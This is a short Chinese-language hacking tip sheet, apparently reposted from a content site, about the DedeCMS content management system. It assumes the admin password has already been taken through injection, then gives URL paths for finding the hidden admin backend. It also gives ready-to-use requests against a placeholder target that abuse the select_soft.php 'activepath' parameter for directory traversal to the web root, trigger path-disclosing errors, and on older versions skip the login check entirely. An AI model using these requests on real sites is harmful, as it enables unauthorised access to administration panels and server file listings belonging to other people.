有时在通过注射得到织梦程序的管理密码时,却发现找不到后台地址,
织梦dedecms管理系统后台查找
。。这个时候大家可以尝试下在地址后面加上:
1、/include/dialog/select_media.php?f=form1.murl
2、/include/dialog/select_soft.php
但不一定通杀。。
以下为逍遥复仇整理的dede一些小问题,希望对大家有用:
DedeCmsV5.1 FreeSP1
访问http://target.com/include/dialog/select_soft.php?activepath=/include/FCKeditor可以跳转目录
跳转到根目录的方法为:
http://target.com/include/dialog/select_soft.php?activepath=/././././././././
而且DEDECMS在访问不存在的目录时会报错
如访问http://target.com/include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p
DedeCMS V5.3.1和最新的DedeCMS V5.5正式版,发现这两个版本已经进行了处理,而且只会列出目录和一些允许显示的文件,PHP是不能显示了,爆路径是一样通用的
构造http://target.com/include/dialog/select_soft.php?activepath=/include/FCKeditor也可以浏览此目录下的文件,当然你也可以跳到别的目录,但长度一定要大于设置中的目录,
电脑资料
《织梦dedecms管理系统后台查找》(https://www.unjs.com)。不过前提是你要登陆下才能利用,这个就显得有点鸡肋了
另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉到根目录去。不过这些版本的访问地址有些不同。
地址为http://target.com/require/dialog/select_soft.php?activepath=/././././././././